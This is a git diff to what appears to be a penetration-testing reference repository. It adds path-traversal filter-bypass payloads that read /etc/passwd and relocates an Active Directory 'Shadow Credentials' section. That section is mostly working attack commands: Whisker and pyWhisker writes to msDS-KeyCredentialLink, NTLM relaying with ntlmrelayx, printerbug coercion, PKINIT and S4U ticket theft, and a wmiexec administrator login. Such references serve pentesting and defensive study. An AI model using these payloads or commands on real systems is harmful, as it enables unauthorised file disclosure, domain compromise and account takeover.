diff --git a/.github/hopla_config.json b/.github/hopla_config.json index 89360ff..7de4b8c 100644 --- a/.github/hopla_config.json +++ b/.github/hopla_config.json @@ -315,6 +315,14 @@ "name": "Filter Bypass 2", "value": "..///////..////..//////etc/passwd" }, + { + "name": "Filter Bypass 3", + "value": "...//...//etc/passwd" + }, + { + "name": "Filter Bypass 4", + "value": "%252f..%252f..%252f..%252f..%252fetc/passwd" + }, { "name": "Filter Bypass 3", "value": "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a7c3d4c..0d3473c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -58,7 +58,6 @@ - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) - [Kerberoasting](#kerberoasting) - [KRB_AS_REP Roasting](#krbasrep-roasting) - - [Shadow Credentials](#shadow-credentials) - [Pass-the-Hash](#pass-the-hash) - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Using impacket](#using-impacket) @@ -85,6 +84,7 @@ - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) + - [Shadow Credentials](#shadow-credentials) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing DNS Admins Group](#abusing-dns-admins-group) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -1837,68 +1837,6 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). -### Shadow Credentials - -> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. - -:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists - -**Requirements**: -* Domain Controller on (at least) Windows Server 2016 -* PKINIT Kerberos authentication -* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object - -**Exploitation**: -- From Windows, use [Whisker](https://github.com/eladshamir/Whisker): - ```powershell - # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. - Whisker.exe list /target:computername$ - # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. - Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" - Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] - # Removes a key credential from the target object specified by a DeviceID GUID. - Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b - ``` - -- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): - ```bash - # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" - # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. - pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" - # Removes a key credential from the target object specified by a DeviceID GUID. - python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" - ``` - -**Scenario**: - -- Scenario: Shadow Credential relaying - - Trigger an NTLM authentication from `DC01` (PetitPotam) - - Relay it to `DC02` (ntlmrelayx) - - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) - - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` -- Scenario: Workstation Takeover with RBCD - ```ps1 - # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 - - # Set up ntlmrelayx to relay authentication from target workstation to DC - proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 - - # Execute printer bug to trigger authentication from target workstation - proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file - - # Get a TGT using the newly acquired certificate via PKINIT - proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR - - # Get a TGS for the target account - proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v - - # Utilize the TGS for future activity - export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache - proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab - ``` - ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. @@ -2594,6 +2532,71 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 ``` +### Shadow Credentials + +> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. + +:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists + +**Requirements**: +* Domain Controller on (at least) Windows Server 2016 +* Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured +* PKINIT Kerberos authentication +* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object + +**Exploitation**: +- From Windows, use [Whisker](https://github.com/eladshamir/Whisker): + ```powershell + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + Whisker.exe list /target:computername$ + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" + Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] + # Removes a key credential from the target object specified by a DeviceID GUID. + Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b + ``` + +- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): + ```bash + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" + # Removes a key credential from the target object specified by a DeviceID GUID. + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" + ``` + +**Scenario**: + +- **Scenario 1**: Shadow Credential relaying + - Trigger an NTLM authentication from `DC01` (PetitPotam) + - Relay it to `DC02` (ntlmrelayx) + - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) + - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` + +- **Scenario 2**: Workstation Takeover with RBCD + ```ps1 + # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 + + # Set up ntlmrelayx to relay authentication from target workstation to DC + proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 + + # Execute printer bug to trigger authentication from target workstation + proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file + + # Get a TGT using the newly acquired certificate via PKINIT + proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR + + # Get a TGS for the target account + proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v + + # Utilize the TGS for future activity + export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache + proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab + ``` + + ### Dangerous Built-in Groups Usage If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. @@ -3863,4 +3866,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) * [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) * [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) -* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) \ No newline at end of file +* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) +* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) \ No newline at end of file